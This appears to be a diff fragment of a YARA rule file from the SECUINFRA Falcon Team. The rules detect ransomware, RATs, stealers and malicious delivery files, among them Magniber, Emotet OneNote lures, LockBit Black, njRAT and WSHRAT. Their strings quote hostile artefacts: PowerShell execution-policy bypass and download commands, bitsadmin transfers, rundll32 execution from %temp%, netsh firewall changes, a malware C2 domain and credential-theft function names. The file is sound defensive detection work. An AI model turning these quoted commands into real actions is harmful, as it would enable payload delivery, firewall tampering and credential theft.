-		hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f"
-		hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2"
-
-	strings:
-		$s_protected = "This document is protected" wide
-		$s_click = "You have to double-click \"View\" button to open" wide
-		$s_imgFileName = "Untitled picture.jpg" wide
-		$script = "language=\"VBScript\""
-		$wsfExt = ".wsf" ascii wide
-		$GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22}
-		$endTmp = /rad.{5}\.tmp/
 
 	condition:
-		uint32be( 0x0 ) == 0xE4525C7B and any of ( $s_* ) and $script and $wsfExt and $GUIDwsf and $endTmp
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and pe.signatures [ i ] . serial == "11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54" )
 }
 rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Python_Feb23
 {
@@ -166265,6 +166333,31 @@ rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Python_Feb23
 	condition:
 		$python and $desc and 4 of ( $command* ) and $cmd and $OpenSLPPort and $listener
 }
+rule SECUINFRA_RANSOM_Magniber_LNK_Jan23
+{
+	meta:
+		description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method"
+		author = "SECUINFRA Falcon Team"
+		id = "2459a9e9-a6bb-50fc-9920-7632fdec7e91"
+		date = "2023-01-13"
+		modified = "2023-01-13"
+		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar#L1-L18"
+		license_url = "N/A"
+		hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c"
+		logic_hash = "074611d74e382bb19a45b052b5b2cc186bf3667420cb1625e9bda37f2e9774c5"
+		score = 75
+		quality = 70
+		tags = ""
+		tlp = "CLEAR"
+
+	strings:
+		$netbiosName = "victim1" ascii fullword
+		$macAddress = {00 0C 29 07 E1 6D}
+
+	condition:
+		uint32be( 0x0 ) == 0x4C000000 and all of them
+}
 rule SECUINFRA_MALWARE_Plugx_USB_Delivery_LNK_Jun23
 {
 	meta:
@@ -166434,34 +166527,6 @@ rule SECUINFRA_RANSOM_Medusalocker_July22 : RANSOMWARE FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "1a395bd10b20c116b11c2db5ee44c225" and filesize > 450KB and filesize < 1MB and all of ( $log* ) and $mutex and any of ( $uacbypass* ) and 2 of ( $note* ) and $ext and $services and 2 of ( $system* )
 }
-rule SECUINFRA_RANSOM_Magniber_ISO_Jan23 : FILE
-{
-	meta:
-		description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method"
-		author = "SECUINFRA Falcon Team"
-		id = "6d5a937d-ac31-5c59-8e93-3fadc772d132"
-		date = "2023-01-13"
-		modified = "2023-01-13"
-		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar#L1-L24"
-		license_url = "N/A"
-		hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6"
-		logic_hash = "238baa794f4a87102534f7d6901819aa1b5dbb8156d56fb311e9fb1a6bc77f30"
-		score = 75
-		quality = 68
-		tags = "FILE"
-		tlp = "CLEAR"
-
-	strings:
-		$magic = {43 44 30 30 31}
-		$tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39}
-		$msiMagic = {D0 CF 11 E0 A1 B1 1A E1}
-		$dosString = "!This program cannot be run in DOS mode" ascii
-		$lnkMagic = {4C 00 00 00}
-
-	condition:
-		filesize > 200KB and filesize < 800KB and all of them
-}
 rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Bash_Feb23
 {
 	meta:
@@ -166503,458 +166568,340 @@ rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Bash_Feb23
 	condition:
 		$bash and $wait and any of ( $comment* ) and 2 of ( $kill* ) and $index and 4 of ( $ext* ) and 2 of ( $clean* )
 }
-rule SECUINFRA_RANSOM_Magniber_LNK_Jan23
+rule SECUINFRA_MALWARE_Emotet_Onenote_Delivery_Wsf_Mar23
 {
 	meta:
-		description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method"
-		author = "SECUINFRA Falcon Team"
-		id = "2459a9e9-a6bb-50fc-9920-7632fdec7e91"
-		date = "2023-01-13"
-		modified = "2023-01-13"
-		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar#L1-L18"
+		description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "a9201240-407d-5ca9-b7fd-37372a2e7d2a"
+		date = "2023-03-16"
+		modified = "2023-03-16"
+		reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar#L1-L33"
 		license_url = "N/A"
-		hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c"
-		logic_hash = "074611d74e382bb19a45b052b5b2cc186bf3667420cb1625e9bda37f2e9774c5"
+		logic_hash = "ca48f5e694b18e3f0b89b0128817848a7d36f60d8a3ada522739849bf3f7126b"
 		score = 75
 		quality = 70
 		tags = ""
 		tlp = "CLEAR"
+		hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4"
+		hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8"
+		hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f"
+		hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2"
 
 	strings:
-		$netbiosName = "victim1" ascii fullword
-		$macAddress = {00 0C 29 07 E1 6D}
-
-	condition:
-		uint32be( 0x0 ) == 0x4C000000 and all of them
-}
-
-rule SECUINFRA_MAL_Redline_Certificate_Bosch : FILE
-{
-	meta:
-		description = "Detects Certificate used by Redline Stealer"
-		author = "SECUINFRA Falcon Team"
-		id = "a91d0510-ab4e-5f22-bcce-9a42beff5190"
-		date = "2022-12-02"
-		modified = "2022-02-13"
-		reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L3-L16"
-		license_url = "N/A"
-		logic_hash = "b3084bee5151543c0931bef9d320805d9e4d63c25be029da4e592d5a0b080a0e"
-		score = 75
-		quality = 70
-		tags = "FILE"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and pe.signatures [ i ] . serial == "72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11" )
-}
-
-rule SECUINFRA_MAL_Redline_Certificate_Geforce : FILE
-{
-	meta:
-		description = "Detects Certificate used by Redline Stealer"
-		author = "SECUINFRA Falcon Team"
-		id = "70081810-704e-5734-8a78-f97e17989460"
-		date = "2022-02-13"
-		modified = "2022-02-13"
-		reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L18-L31"
-		license_url = "N/A"
-		logic_hash = "04e9bfd886be1550b0efd22f0098cc13a5fb6e7cae30b866a4066d0c8f433367"
-		score = 75
-		quality = 70
-		tags = "FILE"
+		$s_protected = "This document is protected" wide
+		$s_click = "You have to double-click \"View\" button to open" wide
+		$s_imgFileName = "Untitled picture.jpg" wide
+		$script = "language=\"VBScript\""
+		$wsfExt = ".wsf" ascii wide
+		$GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22}
+		$endTmp = /rad.{5}\.tmp/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and pe.signatures [ i ] . serial == "11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54" )
+		uint32be( 0x0 ) == 0xE4525C7B and any of ( $s_* ) and $script and $wsfExt and $GUIDwsf and $endTmp
 }
-rule SECUINFRA_MAL_Nw0Rm : FILE
+rule SECUINFRA_MALWARE_Formbook_Filename_Stage_2 : FILE
 {
 	meta:
-		description = "Detect the final RAT dropped by N-W0rm"
+		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "b014ce63-33ec-51df-a529-0c197dac2d7a"
-		date = "2022-03-02"
-		modified = "2022-02-07"
-		reference = "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/n-w0rm.yar#L1-L24"
+		id = "74ae157c-30b3-5f07-83a3-6bc9e854fa84"
+		date = "2022-02-19"
+		modified = "2022-02-27"
+		reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/formbook.yar#L2-L14"
 		license_url = "N/A"
-		hash = "08587e04a2196aa97a0f939812229d2d"
-		logic_hash = "04078c57c1aa0065fceec7dc92b201bda23de1c5f5a940803a81250bdd685736"
+		logic_hash = "707fa457a99b47419b0b77716ed1f61cdb493f04cc26a156f903a30ef30ac428"
 		score = 75
 		quality = 70
 		tags = "FILE"
+		version = "0.1"
 
 	strings:
-		$a1 = "N-W0rm" fullword wide
-		$a2 = "N_W0rm" fullword wide
-		$a3 = "|NW|" fullword wide
-		$b1 = "Select * from AntivirusProduct" fullword wide
-		$b2 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File" fullword wide
-		$b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
-		$b4 = "killer" fullword wide
-		$b5 = "nyanmoney02.duckdns.org" fullword wide
+		$name = "PDF-Scan180220225499044" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $a* ) and 2 of ( $b* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and $name
 }
-rule SECUINFRA_MAL_WSHRAT : RAT JAVASCRIPT WSHRAT FILE
+rule SECUINFRA_RANSOM_Magniber_ISO_Jan23 : FILE
 {
 	meta:
-		description = "Detects the final Payload of WSHART"
+		description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method"
 		author = "SECUINFRA Falcon Team"
-		id = "8db5e349-c83e-53c3-a44d-cfe4732fe08d"
-		date = "2022-12-02"
-		modified = "2022-02-13"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/wshrat.yar#L2-L44"
+		id = "6d5a937d-ac31-5c59-8e93-3fadc772d132"
+		date = "2023-01-13"
+		modified = "2023-01-13"
+		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar#L1-L24"
 		license_url = "N/A"
-		hash = "b7f53ccc492400290016e802e946e526"
-		logic_hash = "12d893f0ca83e805fa570d3f72eb733c8d8b1ae6c0d37bf179ac675d108c7412"
+		hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6"
+		logic_hash = "238baa794f4a87102534f7d6901819aa1b5dbb8156d56fb311e9fb1a6bc77f30"
 		score = 75
 		quality = 68
-		tags = "RAT, JAVASCRIPT, WSHRAT, FILE"
+		tags = "FILE"
+		tlp = "CLEAR"
 
 	strings:
-		$function1 = "runBinder"
-		$function2 = "getBinder"
-		$function3 = "Base64Encode"
-		$function4 = "payloadLuncher"
-		$function5 = "getMailRec"
-		$function6 = "getHbrowser"
-		$function7 = "passgrabber"
-		$function8 = "getRDP"
-		$function9 = "getUVNC"
-		$function10 = "getConfig"
-		$function11 = "getKeyLogger"
-		$function12 = "enumprocess"
-		$function13 = "cmdshell"
-		$function14 = "faceMask"
-		$function15 = "upload"
-		$function16 = "download"
-		$function17 = "sitedownloader"
-		$function18 = "servicestarter"
-		$function19 = "payloadLuncher"
-		$function20 = "keyloggerstarter"
-		$function21 = "reverserdp"
-		$function22 = "reverseproxy"
-		$function23 = "decode_pass"
-		$function24 = "disableSecurity"
-		$function25 = "installsdk"
-		$cmd1 = "osversion = eval(osversion)"
-		$cmd2 = "download(cmd[1],cmd[2])"
-		$cmd3 = "keyloggerstarter(cmd[1]"
-		$cmd4 = "decode_pass(retcmd);"
+		$magic = {43 44 30 30 31}
+		$tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39}
+		$msiMagic = {D0 CF 11 E0 A1 B1 1A E1}
+		$dosString = "!This program cannot be run in DOS mode" ascii
+		$lnkMagic = {4C 00 00 00}
 
 	condition:
-		filesize < 2MB and 2 of ( $cmd* ) and 12 of ( $function* )
+		filesize > 200KB and filesize < 800KB and all of them
 }
 
-rule SECUINFRA_MAL_Njrat : FILE
+rule SECUINFRA_RANSOM_Lockbit_Black_Packer : RANSOMWARE FILE
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
+		description = "Detects the packer used by Lockbit Black (Version 3)"
 		author = "SECUINFRA Falcon Team"
-		id = "eeea8bcf-0d19-5c43-92cc-55c1110f46e5"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/njrat.yar#L3-L35"
+		id = "f4c1a12b-eb89-5a46-97a9-f0207ca1bbde"
+		date = "2022-07-04"
+		modified = "2022-07-04"
+		reference = "https://twitter.com/vxunderground/status/1543661557883740161"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Lockbit_Black_Packer.yar#L5-L40"
 		license_url = "N/A"
-		logic_hash = "e6f5ce20df70bc2f9d00931a84db08c1918a0639555204de8e86f3ba583a73f5"
+		logic_hash = "cde7f5374b97b2462cfd951994b6bb3ef0962e1be71253e25ca14d53c3d3d615"
 		score = 75
-		quality = 70
-		tags = "FILE"
-		hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126"
-		hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa"
-		hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944"
-
-	strings:
-		$mutex_1 = "02ddd2742fd5023579c925948979506c" wide
-		$mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide
-		$mutex_3 = "f7d3b79624476341312866012d0bbf19" wide
-		$a1 = "\"|'|'|\"" wide
-		$a2 = "SEE_MASK_NOZONECHECKS" wide
-		$b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$b2 = "netsh firewall" wide
-		$b3 = "[ENTER]\\r\\n" wide
-		$b4 = "Execute ERROR" wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imports ( "mscoree.dll" ) and pe.imports ( "avicap32.dll" ) and 1 of ( $mutex_* ) or ( 1 of ( $a* ) and 2 of ( $b* ) )
-}
-rule SECUINFRA_MALWARE_Onenote_Delivery_Jan23
-{
-	meta:
-		description = "Detects suspicious Microsoft OneNote files used to deliver Malware"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "ebf02a11-6f53-573d-bd7a-9948cef9fb3a"
-		date = "2023-01-19"
-		modified = "2023-01-19"
-		reference = "https://twitter.com/James_inthe_box/status/1615421130877329409"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/MALWARE_OneNote_Delivery_Jan23.yar#L1-L56"
-		license_url = "N/A"
-		logic_hash = "08c38eedf500fd1a0224e396b41aebb8ac82b3705321ca798ac1007ea34366e1"
-		score = 65
-		quality = 66
-		tags = ""
-		tlp = "CLEAR"
-		hash0 = "18af397a27e58afb901c92f37569d48e3372cf073915723e4e73d44537bcf54d"
-		hash1 = "de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf"
-		hash2 = "bfc979c0146d792283f825f99772370f6ff294dfb5b1e056943696aee9bc9f7b"
-		hash3 = "e0d9f2a72d64108a93e0cfd8066c04ed8eabe2ed43b80b3f589b9b21e7f9a488"
-		hash4 = "3f00a56cbf9a0e59309f395a6a0b3457c7675a657b3e091d1a9440bd17963f59"
+		quality = 45
+		tags = "RANSOMWARE, FILE"
+		tlp = "WHITE"
+		hash0 = "80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce"
+		hash1 = "506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51"
+		hash2 = "d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee"
 
 	strings:
-		$hta = "hta:application" nocase
-		$script1 = "type=\"text/vbscript\""
-		$script2 = "language=\"VBScript\""
-		$powershell = "powershell" nocase
-		$startProc = "Start-Process -Filepath"
-		$webReq = "Invoke-WebRequest -Uri"
-		$bitsadmin = "bitsadmin /transfer"
-		$wscript = "WScript.Shell" nocase
-		$autoOpen = "Sub AutoOpen()"
-		$root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")"
-		$wsfExt = ".wsf" ascii wide
-		$vbsExt = ".vbs" ascii wide
-		$cmd = "cmd /c" nocase
-		$batch = "@echo off"
-		$batExt = ".bat" ascii wide
-		$delExit = "(goto) 2>nul & del \"%~f0\"..exit /b"
-		$dosString = "!This program cannot be run in DOS mode"
-		$exeExt = ".exe" ascii wide
-		$imageFile = "button_click-to-view-document.png" wide
-		$click = "click to view document" nocase wide
-		$path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide
-		$path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide
-		$path3 = "C:\\Users\\julien.galleron\\Downloads" wide
+		$sectionname0 = ".rdata$zzzdbg" ascii
+		$sectionname1 = ".xyz" ascii fullword
+		$check0 = {3d 75 80 91 76 ?? ?? 3d 1b a4 04 00 ?? ?? 3d 9b b4 84 0b}
+		$check1 = {3d 75 ba 0e 64}
+		$asciiCalc = {66 83 f8 41 ?? ?? 66 83 f8 46 ?? ?? 66 83 e8 37}
 
 	condition:
-		uint32be( 0x0 ) == 0xE4525C7B and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize > 111KB and filesize < 270KB and all of ( $sectionname* ) and any of ( $check* ) and $asciiCalc and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( math.entropy ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) > 7.9 and ( pe.sections [ i ] . name == ".text" or pe.sections [ i ] . name == ".data" or pe.sections [ i ] . name == ".pdata" ) and console.log ( "High Entropy section found:" , pe.sections [ i ] . name ) )
 }
-rule SECUINFRA_SUSP_Discord_Attachments_URL : PE DOWNLOAD FILE
+rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll_1 : POWERSHELL DOWNLOAD
 {
 	meta:
-		description = "Detects a PE file that contains an Discord Attachments URL. This is often used by Malware to download further payloads"
+		description = "Detect a Download to %temp% and execution with rundll32.exe"
 		author = "SECUINFRA Falcon Team"
-		id = "bf81920b-f8ab-594a-aa45-d92446411113"
-		date = "2022-02-19"
-		modified = "2022-02-27"
+		id = "f7a9d2e6-bebf-598b-9e59-db0a3001b9f9"
+		date = "2022-09-02"
+		modified = "2022-02-19"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L3-L16"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/PowerShell_Misc/download_variations.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "3270b74506e520064361379b274f44a467c55bdcd3d8456967e864526aca8521"
+		logic_hash = "7982438c032127349fb1c3477a23bab1c92eb68d9c3b26e2f5fb0a8c332dbc44"
 		score = 65
 		quality = 70
-		tags = "PE, DOWNLOAD, FILE"
-		version = "0.1"
+		tags = "POWERSHELL, DOWNLOAD"
 
 	strings:
-		$url = "cdn.discordapp.com/attachments" nocase wide
+		$location = "$Env:temp" nocase
+		$download = "downloadfile(" nocase
+		$rundll = "rundll32.exe"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $url
+		$location and $download and $rundll
 }
-
-rule SECUINFRA_SUSP_DOTNET_PE_Download_To_Specialfolder : DOTNET DOWNLOAD FILE
+rule SECUINFRA_DROPPER_Valyria_Stage_1 : JAVASCRIPT VBS VALYRIA FILE
 {
 	meta:
-		description = "Detects a .NET Binary that downloads further payload and retrieves a special folder"
+		description = "Family was taken from VirusTotal"
 		author = "SECUINFRA Falcon Team"
-		id = "106683bf-1d36-58ee-b5af-4723aa70fdad"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L45-L64"
+		id = "7e2ab9db-142c-5dee-92b7-4a70d747c540"
+		date = "2022-02-18"
+		modified = "2022-02-18"
+		reference = "https://bazaar.abuse.ch/sample/c8a8fea3cbe08cd97e56a0e0dbc59a892f8ab1ff3b5217ca3c9b326eeee6ca66/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/valyria.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "d44c89ab126f79596c8bf3f1327b37a2463faa4e3bb258f9a96d495ac40003f8"
-		score = 65
+		logic_hash = "94643123a4be26c818d43a77b907edf8651d306463f4df750db67cef790f10eb"
+		score = 75
 		quality = 70
-		tags = "DOTNET, DOWNLOAD, FILE"
+		tags = "JAVASCRIPT, VBS, VALYRIA, FILE"
 
 	strings:
-		$special_folder = "Environment.SpecialFolder" wide
-		$webclient = "WebClient()" wide
-		$download = ".DownloadFile(" wide
+		$a1 = "<script language=\"vbscript\">"
+		$a2 = "<script language=\"javascript\">"
+		$b1 = "window.resizeTo(0,0);"
+		$b2 = ".Environment"
+		$b3 = ".item().Name"
+		$b4 = "v4.0.30319"
+		$b5 = "v2.0.50727"
+		$c1 = "Content Writing.docx"
+		$c2 = "eval"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imports ( "mscoree.dll" ) and $special_folder and $webclient and $download
+		filesize < 600KB and all of ( $a* ) and 3 of ( $b* ) and 1 of ( $c* )
 }
-
-rule SECUINFRA_SUSP_DOTNET_PE_List_AV : DOTNET AV FILE
+rule SECUINFRA_MAL_Agenttesla_Stage_1 : JAVASCRIPT AGENTTESLA OBFUSCATORIO FILE
 {
 	meta:
-		description = "Detecs .NET Binary that lists installed AVs"
+		description = "Detects the first stage of AgentTesla (JavaScript)"
 		author = "SECUINFRA Falcon Team"
-		id = "0f27567a-ab41-5d17-a1d8-a59c9602eb35"
+		id = "0a098f27-8dbc-5749-9a0d-fd0198184c7a"
 		date = "2022-02-27"
 		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L66-L82"
+		reference = "https://bazaar.abuse.ch/sample/bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/agent_tesla.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "b82e6ed5740cab26eb3848717204190d61663e7e42ff42536386b00181a15ebb"
-		score = 65
-		quality = 70
-		tags = "DOTNET, AV, FILE"
+		hash = "bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec"
+		logic_hash = "7c21f80a02aa161ffb2edf47aff796f22aff2a563abcb0097cc86371c05e516d"
+		score = 75
+		quality = 45
+		tags = "JAVASCRIPT, AGENTTESLA, OBFUSCATORIO, FILE"
 
 	strings:
-		$mgt_obj_searcher = "\\root\\SecurityCenter2" wide
-		$query = "Select * from AntivirusProduct" wide
+		$mz = "TVq"
+		$a1 = ".jar"
+		$a2 = "bin.base64"
+		$a3 = "appdata"
+		$a4 = "skype.exe"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imports ( "mscoree.dll" ) and $mgt_obj_searcher and $query
+		filesize < 500KB and $mz and 3 of ( $a* )
 }
-rule SECUINFRA_SUSP_Netsh_Firewall_Command : PE FILE
+rule SECUINFRA_DROPPER_Vjw0Rm_Stage_1 : JAVASCRIPT DROPPER VJW0RM FILE
 {
 	meta:
 		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "c62cbe3f-9585-56c0-bb09-83a36437abda"
-		date = "2022-02-27"
+		id = "a07f80e4-56c3-5b75-be64-648bc1fde964"
+		date = "2022-02-19"
 		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L84-L97"
-		license_url = "N/A"
-		logic_hash = "7d19b433785684ce1d2b008b3fdd36b22c5c82bfec476c787dfa025080b6178d"
-		score = 65
-		quality = 70
-		tags = "PE, FILE"
-
-	strings:
-		$netsh_delete = "netsh firewall delete" wide
-		$netsh_add = "netsh firewall add" wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( $netsh_delete or $netsh_add )
-}
-rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Installer_Feb23
-{
-	meta:
-		description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "beaf08a8-a1c3-5d9c-b7cb-81a49c5bc2ec"
-		date = "2023-02-01"
-		modified = "2023-02-07"
-		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar#L1-L22"
+		reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/Vjw0rm.yar#L2-L19"
 		license_url = "N/A"
-		logic_hash = "ad3f0545b2fe285adf67f053c8b422126a1bdff1b6835631280442495d975d16"
-		score = 50
-		quality = 30
-		tags = ""
-		tlp = "CLEAR"
+		logic_hash = "e5cc23431239e8a650369729050809cf6fe2acc58941086f79ce004b4f506eed"
+		score = 75
+		quality = 20
+		tags = "JAVASCRIPT, DROPPER, VJW0RM, FILE"
+		version = "0.1"
 
 	strings:
-		$s_manifest = "AppxManifest.xml"
-		$s_block = "AppxBlockMap.xml"
-		$s_peExt = ".exe"
-		$sig = "AppxSignature.p7x"
+		$a1 = "$$$"
+		$a2 = "microsoft.xmldom"
+		$a3 = "eval"
+		$a4 = "join(\"\")"
 
 	condition:
-		uint16be( 0x0 ) == 0x504B and 2 of ( $s* ) and not $sig
+		( uint16( 0 ) == 0x7566 or uint16( 0 ) == 0x6176 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x660a ) and filesize < 60KB and all of ( $a* )
 }
-rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll_1 : POWERSHELL DOWNLOAD FILE
